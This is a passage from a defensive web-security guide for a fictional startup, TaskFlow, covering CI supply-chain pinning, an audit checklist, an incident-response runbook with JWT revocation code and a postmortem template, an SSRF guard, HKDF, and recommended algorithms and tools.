Supply Chain Security
# Pin ALL action versions to commit SHAs, not tags
# Tags are mutable — an attacker who compromises the action repo can move a tag
# Generate SLSA provenance for artifacts
- name: Build and push with provenance
uses: docker/build-push-action@48aba3b46d1b1fec4febb7c5d0c644b249a11355
with:
push: true
tags: ghcr.io/taskflow/api:${{ github.sha }}
provenance: true # SLSA Level 1 — generates provenance attestation
sbom: true # Software Bill of Materials
16. Security Audit Walkthrough
TaskFlow is raising a Series A. The investors require a security audit. The CTO asks: "What should we review before bringing in the external auditors?"
Authentication
| Check | Severity if missing |
|---|---|
| Passwords hashed with bcrypt/argon2 (not MD5/SHA) | Critical |
| Brute-force protection on login and password reset | High |
| MFA available (TOTP or passkeys) | High |
| Session invalidated on logout | High |
| JWT algorithm explicitly validated (not "any") | Critical |
| Refresh token rotation on use | High |
| Magic link tokens single-use with TTL | High |
Authorization
| Check | Severity if missing |
|---|---|
| Every endpoint checks authorization (not just authentication) | Critical |
| No IDOR — resource IDs scoped to authenticated user context | Critical |
| Admin endpoints require separate elevated role check | Critical |
| Authorization enforced server-side (not only in frontend) | Critical |
| Horizontal privilege escalation tested | Critical |
Data
| Check | Severity if missing |
|---|---|
| All DB queries parameterized (no string interpolation) | Critical |
| PII encrypted at rest | High |
| Database backups encrypted | High |
| DB user has least-privilege (not superuser) | High |
| No PII in log files or error messages | High |
| Sensitive API response fields explicitly excluded | High |
Infrastructure
| Check | Severity if missing |
|---|---|
| HTTPS enforced everywhere (HSTS header) | Critical |
| Secrets in secrets manager, not plain env vars in code | High |
| No secrets in git history | Critical |
| CI/CD actions pinned to SHA | Medium |
| Container images scanned for CVEs | High |
| Security headers present (CSP, HSTS, X-Frame-Options) | Medium |
| Rate limiting on public endpoints | High |
17. Incident Response
3 AM. An alert fires: unusual API activity — one user_id querying thousands of tasks across dozens of workspaces. You wake up to a Slack message. What do you do in the next 30 minutes?
Incident Response Phases
First 30 Minutes — Containment
# Step 1: Identify the suspicious activity
# Check API logs for the pattern
grep "user_id=suspicious_id" /var/log/api/access.log | \
awk '{print $1, $7, $9}' | sort | head -50
# Step 2: Revoke all active sessions for compromised user
# (depends on your session store)
# Iterate the keyspace safely with --scan (a single SCAN call only returns one page)
redis-cli --scan --pattern "session:*" | while read -r key; do
  if [ "$(redis-cli HGET "$key" user_id)" = "compromised_user_id" ]; then
    redis-cli DEL "$key"
  fi
done
# Step 3: Rotate compromised credentials
# If API key was leaked:
db.api_keys.revoke(leaked_key_id)
# If JWT secret may be compromised:
# Change JWT_SECRET — this invalidates ALL tokens for ALL users
# (nuclear option — only if necessary)
# Step 4: Check what was accessed
SELECT target_resource, COUNT(*), MIN(ts), MAX(ts)
FROM audit_log
WHERE actor_id = 'compromised_user'
AND ts > NOW() - INTERVAL '24 hours'
GROUP BY target_resource
ORDER BY COUNT(*) DESC;
# Step 5: Assess blast radius — did they access other users' data?
SELECT DISTINCT workspace_id
FROM audit_log
WHERE actor_id = 'compromised_user'
AND event = 'task.viewed';
JWT Revocation — The Hard Problem
JWTs are stateless — you can't "delete" a token. If a user's JWT is stolen, it's valid until expiry. Options:
| Approach | How it works | Trade-off |
|---|---|---|
| Short expiry (15 min) | Token naturally expires quickly | Requires frequent refresh; still 15-min window |
| Token blocklist | Store revoked JTI (JWT ID) in Redis; check on every request | Loses statelessness benefit; Redis lookup per request |
| Rotate secret | Change signing secret; invalidates all tokens | Logs out all users simultaneously |
| Version in token | Store token_version per user in DB; increment to invalidate | One DB lookup per request; graceful invalidation |
# Token version pattern — graceful per-user revocation
import jwt  # PyJWT. redis, db, SECRET_KEY, AuthError are app-level objects
def verify_access_token(token: str) -> dict:
payload = jwt.decode(
token,
SECRET_KEY,
algorithms=["HS256"],
options={"require": ["exp", "sub", "iss"]},
issuer="https://taskflow.app",
)
# Check token version against DB (cached in Redis with short TTL)
user_version = redis.get(f"token_version:{payload['sub']}")
if user_version is None:
user_version = db.users.get_token_version(payload["sub"])
redis.setex(f"token_version:{payload['sub']}", 60, user_version)
if int(payload.get("ver", 0)) < int(user_version):
raise AuthError("Token revoked")
return payload
def revoke_user_tokens(user_id: str):
"""Invalidate all tokens for a user by incrementing their version."""
new_version = db.users.increment_token_version(user_id)
redis.setex(f"token_version:{user_id}", 60, new_version)
GDPR 72-Hour Notification
Under GDPR, if a breach affects EU residents' personal data, you must notify your supervisory authority within 72 hours of becoming aware of it. Your incident response plan must include:
- Who is the Data Protection Officer (or responsible person)?
- Which data was affected? (categories, approximate number of individuals)
- What is the likely consequence of the breach?
- What measures have you taken to address it?
Postmortem Template
## Incident Postmortem: [Incident Title]
**Date:** 2026-03-18
**Severity:** P1 (Critical)
**Duration:** 4 hours
**Lead:** [Name]
### Timeline
- 03:14 — Alert fired: anomalous API activity
- 03:22 — On-call engineer paged and began investigation
- 03:45 — Compromised token identified and revoked
- 05:30 — Root cause identified: stolen refresh token via phishing
- 07:15 — Remediation deployed; monitoring confirmed clean
### Impact
- 1 user account compromised
- 23 workspace records read (not exfiltrated)
- No data modified or deleted
### Root Cause
Refresh token not invalidated on logout. User had logged out but token remained valid for 30 days.
### Contributing Factors
- No alert on geographic anomaly (login from new country)
- Refresh token TTL was 30 days (too long)
### Action Items
| Action | Owner | Due |
|--------|-------|-----|
| Revoke refresh tokens on logout | @backend-team | 2026-03-20 |
| Add geographic anomaly detection | @security | 2026-03-25 |
| Reduce refresh token TTL to 7 days | @backend-team | 2026-03-20 |
| Add test for logout token revocation | @backend-team | 2026-03-20 |
### What Went Well
- Alert fired quickly
- Runbook was available and followed
- Blast radius was limited due to audit logging
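The last action item ("add test for logout token revocation") is worth making concrete, since the missing test is what let the root cause ship. A sketch against a hypothetical in-memory session store (all names here are invented for illustration; the real test would exercise your actual session layer):

```python
class SessionStore:
    """Toy stand-in for the real session layer (illustrative only)."""
    def __init__(self):
        self._valid: set[str] = set()
        self._counter = 0

    def issue_refresh_token(self, user_id: str) -> str:
        self._counter += 1
        token = f"rt-{user_id}-{self._counter}"
        self._valid.add(token)
        return token

    def logout(self, token: str) -> None:
        self._valid.discard(token)  # the fix: revoke on logout

    def is_valid(self, token: str) -> bool:
        return token in self._valid

def test_logout_revokes_refresh_token():
    store = SessionStore()
    token = store.issue_refresh_token("alice")
    assert store.is_valid(token)
    store.logout(token)
    assert not store.is_valid(token)  # fails if logout leaves the token live
```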
18. Security Decision Matrix
When building any new feature, use this matrix as a checklist. Not all concerns apply to every feature, but for each that does, there's a concrete action.
| Feature characteristic | Security concerns to address |
|---|---|
| Handles user input | Input validation (Pydantic/JSON Schema), output encoding, parameterized queries, file type validation |
| Stores sensitive data | Encryption at rest (AES-256-GCM), key management, retention policy, GDPR consent |
| Has authentication | Brute-force protection, MFA support, credential breach check, session management |
| Exposes an API endpoint | Authentication required, authorization checked, rate limiting, input validation, CORS policy |
| Fetches external URLs | SSRF prevention (allowlist or IP validation), timeout, redirect limit |
| Processes payments | PCI-DSS scope reduction (use Stripe tokens, never raw card data), audit logging, idempotency keys |
| Handles PII | GDPR/CCPA compliance, data minimization, retention limits, no PII in logs, right to deletion |
| Uses third-party services | Secrets in vault (not hardcoded), rotation plan, webhook signature verification, vendor security review |
| Has admin functions | Elevated role check, audit logging, MFA enforcement for admins, IP allowlisting |
| Sends emails or notifications | No sensitive data in subject, rate limit to prevent abuse, SPF/DKIM/DMARC configured |
| Uses CI/CD pipeline | Pin action SHAs, secret scanning, dependency scanning, SAST, least-privilege service account |
| New service or microservice | mTLS or service mesh, secrets injection, no default credentials, threat model the data flows |
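The "fetches external URLs" row deserves a concrete shape. A minimal SSRF guard using only the standard library; the scheme allowlist and the set of blocked ranges are assumptions to adapt, and note that this check alone does not stop DNS rebinding (for that, connect to the resolved IP rather than re-resolving the hostname):

```python
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}

def is_safe_url(url: str) -> bool:
    """Reject URLs whose scheme is unexpected or whose host resolves to an
    internal address (loopback, private, link-local, reserved)."""
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES or not parsed.hostname:
        return False
    try:
        infos = socket.getaddrinfo(parsed.hostname, None)
    except socket.gaierror:
        return False  # unresolvable; refuse rather than guess
    for info in infos:
        ip = ipaddress.ip_address(info[4][0])
        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
            return False
    return True
```

For stricter setups, the table's other option (a hostname allowlist) is simpler and safer than trying to enumerate every bad range.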
Quick Reference — Algorithm Choices
| Use case | Recommended | Avoid |
|---|---|---|
| Password storage | argon2id, bcrypt (rounds=12) | MD5, SHA-1, SHA-256, unsalted |
| Token signing (shared secret) | HS256, HS512 | alg:none, weak secrets |
| Token signing (public/private) | ES256 (ECDSA), RS256 | RSA-1024 |
| Symmetric encryption | AES-256-GCM | AES-ECB, DES, RC4 |
| Data integrity (non-password) | SHA-256, SHA-3 | MD5, SHA-1 (collision risk) |
| Key derivation | HKDF, argon2id (for passwords) | Direct truncation, SHA-256 alone |
| TLS version | TLS 1.3, TLS 1.2 | TLS 1.0, TLS 1.1, SSL |
| SSH keys | Ed25519 | RSA-1024, DSA |
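The HKDF row can be shown end to end with only the standard library. A minimal HKDF-SHA256 per RFC 5869 (extract-then-expand); in production you would use a vetted implementation such as the one in the `cryptography` package rather than hand-rolling:

```python
import hashlib
import hmac

HASH_LEN = 32  # SHA-256 output size in bytes

def hkdf_sha256(ikm: bytes, salt: bytes, info: bytes, length: int) -> bytes:
    """HKDF (RFC 5869): extract a pseudorandom key from the input key
    material, then expand it into `length` bytes of output keying material."""
    if not salt:
        salt = b"\x00" * HASH_LEN  # RFC default when no salt is supplied
    prk = hmac.new(salt, ikm, hashlib.sha256).digest()  # extract step
    okm, t = b"", b""
    for counter in range(1, -(-length // HASH_LEN) + 1):  # ceil(length/32) rounds
        t = hmac.new(prk, t + info + bytes([counter]), hashlib.sha256).digest()
        okm += t
    return okm[:length]
```

The `info` parameter is what lets one master secret safely derive independent keys for different purposes (e.g. `b"encryption"` vs `b"signing"`), which is the whole point of the "avoid SHA-256 alone" advice in the table.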
Security Tooling Landscape
| Category | Tool | What it finds |
|---|---|---|
| SAST | Semgrep, CodeQL, Bandit (Python) | Injection, hardcoded secrets, insecure patterns |
| DAST | OWASP ZAP, Burp Suite | XSS, injection, auth flaws at runtime |
| Dependency | Trivy, Snyk, npm audit, pip-audit | Known CVEs in dependencies |
| Secret scanning | detect-secrets, gitleaks, GitHub Advanced Security | Secrets in code and history |
| Container | Trivy, Grype, Clair | CVEs in base images and packages |
| Infrastructure | tfsec, Checkov, Prowler | Terraform/CloudFormation misconfigurations |
Further Reading
- OWASP — owasp.org/Top10 and the Testing Guide (comprehensive manual testing methodology)
- PortSwigger Web Security Academy — Free, hands-on labs for every vulnerability class
- HackTricks — Attacker perspective on every vulnerability
- Google BeyondCorp — Zero trust architecture reference
- REST API Refresher — API design including security patterns
- Networking Refresher — TLS, DNS, HTTP details
- Spring Boot Refresher — Spring Security integration